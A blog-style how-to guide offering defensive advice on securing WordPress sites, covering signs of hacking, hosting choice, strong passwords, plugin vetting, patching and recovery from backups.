How To: Keep Your WordPress Site Secure

With more than 70 million sites around the world running WordPress, it has become a frequent target for hackers.  Security against such hacks is critical to avoid unnecessary downtime or embarrassing warning messages people search for your site on Google.

If you’re an admin, you won’t always know whether your site has been hacked until someone points it out to you after seeing a notice like the one above.  It’s useful to keep an eye on your site(s) and periodically login to your WordPress Dashboard so you can update your plugins and WordPress installation.  You should do this often whether or not you have time to write that blog post you keep telling yourself you’ll write.  If you start to feel paranoid about this process, you’re probably doing something right!

One of the most obvious signs of a hacked web site is load time/speed.  If your site “feels slow,” it could be loading malicious scripts in addition to your normal pages. If you suspect this is the case:

  • Use an HTTP debugger like Fiddler to see what data is being loaded and where it’s being loaded from.  If you see HTTP requests from domain names other than your own, start asking more questions.  Of course scripts like Google Analytics and TypeKit are okay, but question everything. Hackers are sneaky!
  • View the HTML source of your site to see if any unusual scripts are being injected.

Tip #1: In WordPress, most hacks happen in the underlying MySQL database.  This is because even a site that’s totally secure still has to use the underlying MySQL database to store and retrieve posts as well as the /wp-content/uploads/ folder to store your uploaded images, PDFs, etc.

Why Me?

Oftentimes it’s not a specific person that has selected your computer or hosting account as a target.  Usually it’s a highly automated process and it is very much a numbers game.  Hackers have to gain access to large numbers of accounts in order to be successful with their overall exploits.  One hack that we saw turned the underlying hosting account into a host for a fake Royal Bank of Canada login page.  This page was used in combination with a spam and phishing attack to trick people into signing into their RBC account (and therefore giving up their sensitive login data).  Identity Theft is big business for criminals and in today’s digital world it all comes together in ways you’d never expect.

Tip #2: This goes without saying for some of us, but the tactic still works because some people still do it: never click on links or attachments in an e-mail from people you don’t know and never use pirated software.  If you do, you could unknowingly contribute to the success of a malicious hacker!

Hosting Matters

Hosting is very much a “you get what you pay for” service.  Many companies promise “unlimited” resources for under $10/month.  The way they are able to provide this rate is by cutting some corners.  You don’t want your hosting company to cut corners if it could mean downtime and paying someone to fix a hacked site.  Make sure you ask questions about their server, operating system, and security patching schedule.  The best hosting companies will apply the latest security patches at least once per month.

There are a variety of helpful resources on the web that will guide you through a secure setup of your WordPress Installation by locking down your .htaccess file and /wp-content/upload directory.

For example, view the official codex documentation on “Hardening WordPress“.

Strong Usernames and Passwords

Choose your username and password wisely. Your WP install may come with a default “admin” username (depending on who initially sets up the WP installation).  Login and immediately create a new user account with a custom username. Use a solid Password Generator that will force you to create Strong Passwords.

Be careful how you transmit your new account credentials. Avoid sharing usernames and passwords by email multiple times (as part of replies, etc.).  You should also take care storing your login credentials. It’s a good idea not to store the initial username/password email that WP sends.  This prevents access to your WP account should your email account event get hacked.

Use Reputable Plugins

Plugins can be fun and incredibly useful. With more than 19,000 free plugins available from the WP Plugin Directory, you can pretty much find a plugin for anything you can think of. You should, however, use caution and install only the minimum amount of plugins necessary for you site.  There’s usually not a good reason to keep plugins activated if you aren’t using them.  If you’re not using a particular plugin, do yourself a favor:   DELETE IT.  This will help reduce the “surface area” of potential vulnerabilities in your site.

If you really want to lock it down or have had a previous bad experience, then you should only use plugins that have been recently updated to support the latest version of WordPress.  Plugins that have not been updated in 467 days should never be used.  That usually means the plugin developer gave up on maintenance of the plugin and hackers can use this against you!  Also, look for plugins that have at least a 3/5 star rating, have been downloaded thousands of times, is not an early beta version number, and was developed by a reputable developer/company.  All of those things usually indicate a worthy plugin that other WordPress users have vetted.

WordPress Patches

It may be YOUR responsibility and not your webmaster’s responsibility to update your WordPress site with the latest patches from WordPress.  It’s a good idea to check in with your webmaster every once in a while when you are doing major WordPress upgrades (ex: going from version 3.2.1 to 3.4.1).  WordPress is constantly getting updated so it’s not surprising when you get multiple updates in month.  Stay on top of them!

Options for Fixing a Hacked WordPress Site

If you know your site has been hacked, try restoring your site from a backup.  (This is in addition to making sure your host does backups in the first place!)  The backup file you use should be at least a couple of weeks old.  Sometimes hackers will get their malicious code into your site long before the code becomes active.  You may lose valuable posts and other data, though this might be a reasonable compromise to make.

Sometimes, unfortunately, fixing a hacked site is not as simple as going back to a previous that you have zipped up and sitting on your harddrive or in your Dropbox account.  Sometimes you will need to hire an expert to make the right choices.  It may take a few hours of their time, but they are very likely to be able to recover recent posts, e-commerce orders and important files (because they know what they’re doing).

Once you are all cleaned up and ready to go again, make sure you change ALL of your usernames and passwords (using your strong password generator). Work with your webmaster or host to change the underlying database usernames and passwords stored in wp-config.php